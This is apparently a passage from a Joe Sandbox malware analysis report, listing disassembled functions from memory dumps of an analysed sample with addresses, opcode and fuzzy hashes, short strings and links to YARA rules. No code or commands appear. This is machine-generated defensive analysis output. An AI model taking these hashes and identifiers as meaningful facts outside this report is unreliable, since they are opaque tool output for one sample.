                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 3=g
                                                                                                                    • API String ID: 0-2822661338
                                                                                                                    • Opcode ID: 2f931eb7a82c23612d38f49a1526e325ea0c61def6c025cf486146271dfdf125
                                                                                                                    • Instruction ID: 8f8e90713ac3277091b14544cb4e4d82f08cde081437222455ae6a4894d21e8b
                                                                                                                    • Opcode Fuzzy Hash: 2f931eb7a82c23612d38f49a1526e325ea0c61def6c025cf486146271dfdf125
                                                                                                                    • Instruction Fuzzy Hash: DB51F0F3E186108BF354AE29DC8976AB6D6EBC4310F1B493DDBC897780E93D48058696
                                                                                                                    Function 000FE1A0 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 000FE333
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
                                                                                                                    • API String ID: 0-2471034898
                                                                                                                    • Opcode ID: 904a4d81da903f17c020c9bacc7c115defe5fc3a886a688e27880799666ffc6e
                                                                                                                    • Instruction ID: d332c050c0af95694b3e6f6d2a5772afbdfc497d4936e05c530e057491a14f4c
                                                                                                                    • Opcode Fuzzy Hash: 904a4d81da903f17c020c9bacc7c115defe5fc3a886a688e27880799666ffc6e
                                                                                                                    • Instruction Fuzzy Hash: B4512633A196D44BD338893C9C592B97AC70BD2334B3D836AEAF18BBF1E5554900A380
                                                                                                                    Function 00133920 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %*+(
                                                                                                                    • API String ID: 0-3233224373
                                                                                                                    • Opcode ID: 6e5477f0d28f60658e656a32972b7119e98b064a41e4b228864c3cacb4afb828
                                                                                                                    • Instruction ID: 7e15bd20132dc0975d437bb43c00bedcdb64e01fcfb31bf092998090a1350db9
                                                                                                                    • Opcode Fuzzy Hash: 6e5477f0d28f60658e656a32972b7119e98b064a41e4b228864c3cacb4afb828
                                                                                                                    • Instruction Fuzzy Hash: D751A034609240DBDB24DF19D880B2ABBE6FF85749F14882CE4E6D7251D371DD10DB66
                                                                                                                    Function 002A4E83 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ;oT+
                                                                                                                    • API String ID: 0-932072881
                                                                                                                    • Opcode ID: 0162f21ebec2c6fcf02a205fb2c976038103a197ceac3f6333d76fa6c61389c3
                                                                                                                    • Instruction ID: c6aa08514cd99b0e5082808f73fe380b9fb2b727a7427045572d0cb36c273c34
                                                                                                                    • Opcode Fuzzy Hash: 0162f21ebec2c6fcf02a205fb2c976038103a197ceac3f6333d76fa6c61389c3
                                                                                                                    • Instruction Fuzzy Hash: 5C514BF3A086149BE300AA2CDC8476AB7E6DBD4320F2B853DD9D497748E97958048782
                                                                                                                    Function 001ABF60 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: FFW
                                                                                                                    • API String ID: 0-1527388634
                                                                                                                    • Opcode ID: 9e3074d2a1bad80ef18a59c4d3afead64b3aaa6a285ecca91d8d7504f0ead942
                                                                                                                    • Instruction ID: 88e3898078fbbb7177263b9b0a339d96262ec554f8d3da8d3e3940cbb90b0d4d
                                                                                                                    • Opcode Fuzzy Hash: 9e3074d2a1bad80ef18a59c4d3afead64b3aaa6a285ecca91d8d7504f0ead942
                                                                                                                    • Instruction Fuzzy Hash: 0441E7F3A082109FE7086A2DDC4576BFBE5EB98310F16493DDAC893754EA39681186C7
                                                                                                                    Function 00101BEE Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: L3
                                                                                                                    • API String ID: 0-2730849248
                                                                                                                    • Opcode ID: 23b38f53641981754130312bc41cb63587dcaf40624d3c722b7ccc69f694a185
                                                                                                                    • Instruction ID: b9315239cae1d814d6423fc549a720c5f23e967070a85e79fcd20bfff0d018df
                                                                                                                    • Opcode Fuzzy Hash: 23b38f53641981754130312bc41cb63587dcaf40624d3c722b7ccc69f694a185
                                                                                                                    • Instruction Fuzzy Hash: EE4163B8408380ABDB149F64C894A2FBBF0FF86714F04891CF5C59B2A1D77AC905CB56
                                                                                                                    Function 0012FF70 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %*+(
                                                                                                                    • API String ID: 0-3233224373
                                                                                                                    • Opcode ID: 34de7274838fb881e5177da650dedf74df155520e71245c5eb421125d039fc28
                                                                                                                    • Instruction ID: 9c0aaf77918c65212fd5c2b4fc4b45f6dd4037f72b541622a537037e3d8fa2b7
                                                                                                                    • Opcode Fuzzy Hash: 34de7274838fb881e5177da650dedf74df155520e71245c5eb421125d039fc28
                                                                                                                    • Instruction Fuzzy Hash: 8D3114B1908305ABD715EE14DC91F2BB7E9EB89784F544828F88497262E331DC10C7A3
                                                                                                                    Function 0011E40C Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 72?1
                                                                                                                    • API String ID: 0-1649870076
                                                                                                                    • Opcode ID: 9bc604264a22f768bd3a85590240a1480b60cd9dcc6380a3d47319544f72a947
                                                                                                                    • Instruction ID: d56e40303cd0035b2a71d9fe7af2857ff203d4797f564a043dbd06748a998887
                                                                                                                    • Opcode Fuzzy Hash: 9bc604264a22f768bd3a85590240a1480b60cd9dcc6380a3d47319544f72a947
                                                                                                                    • Instruction Fuzzy Hash: 5D31C3B5900209DFE724CF94E9805FFB7F5FB1A348F540828E946A7651D335A984CBA2
                                                                                                                    Function 00106F91 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %*+(
                                                                                                                    • API String ID: 0-3233224373
                                                                                                                    • Opcode ID: 4601a07fca5ec55c77775183268ed335e6c0a6033c67abb2a02eb9674dfe9bbf
                                                                                                                    • Instruction ID: 851941c037250c804b78aaf51327bb5bc50f5386a18c784e5a890133644d0791
                                                                                                                    • Opcode Fuzzy Hash: 4601a07fca5ec55c77775183268ed335e6c0a6033c67abb2a02eb9674dfe9bbf
                                                                                                                    • Instruction Fuzzy Hash: CD412575604B04DBD7348F61D994B26B7F2FB0A701F548918F5C69BAA6E371F8108B10
                                                                                                                    Function 0011E66A Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 72?1
                                                                                                                    • API String ID: 0-1649870076
                                                                                                                    • Opcode ID: 195bfc2f8c1d11eeb15f5576313307caf9b1833b784feeacbd5e1db97c847871
                                                                                                                    • Instruction ID: 50fe7304e63fc4ce7e85f3c02d40b9fcd4d2f998d6774076ac6eb6458a6b659b
                                                                                                                    • Opcode Fuzzy Hash: 195bfc2f8c1d11eeb15f5576313307caf9b1833b784feeacbd5e1db97c847871
                                                                                                                    • Instruction Fuzzy Hash: 3A21E0B5900205DFE724CF94D9909BFBBF5BB1A748F54082CE846AB751D335AD80CBA2
                                                                                                                    Function 002AD8CE Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: a8o
                                                                                                                    • API String ID: 0-792971876
                                                                                                                    • Opcode ID: 595841c3e75cdff33794b17fe52c4d55a9180f36b1509625bab84925ac9a64b2
                                                                                                                    • Instruction ID: 99f088c1acb485b66651d7b50cf71add46e4958fbc58a1609455f02a807aa238
                                                                                                                    • Opcode Fuzzy Hash: 595841c3e75cdff33794b17fe52c4d55a9180f36b1509625bab84925ac9a64b2
                                                                                                                    • Instruction Fuzzy Hash: 4C21C7B3A082204FE3189A7DAC8677AB7D5A740370F2B473DDE94D76C0E9795C4042C6
                                                                                                                    Function 00139CE0 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 2994545307-2766056989
                                                                                                                    • Opcode ID: 728eef0d75dbcd543e7c001859226f8d364ff752aafa883fd6379f1588d77eda
                                                                                                                    • Instruction ID: fd9d83ea476bc03256933e06bd5708958e59a358062bf67b7175bf0906d15e4d
                                                                                                                    • Opcode Fuzzy Hash: 728eef0d75dbcd543e7c001859226f8d364ff752aafa883fd6379f1588d77eda
                                                                                                                    • Instruction Fuzzy Hash: C43198749083009BD314EF54D880A2BFBFAFF9A354F54892CE5C897261D375D944CBA6
                                                                                                                    Function 00104E2A Relevance: 1.0, Instructions: 957COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7ef53904a32b0c4d51924b11161e10f93407f6da7d59c5f59c5ea00b64db5cfc
                                                                                                                    • Instruction ID: a5641be165d46ac1386e05dcd42b33362d1f39060468f2ae1461a21286e66d37
                                                                                                                    • Opcode Fuzzy Hash: 7ef53904a32b0c4d51924b11161e10f93407f6da7d59c5f59c5ea00b64db5cfc
                                                                                                                    • Instruction Fuzzy Hash: 416259B0900B008FD725CF24D994B27B7F6AF59704F54892CE49B8BA92E7B5F844CB91
                                                                                                                    Function 000FBEB0 Relevance: .9, Instructions: 895COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
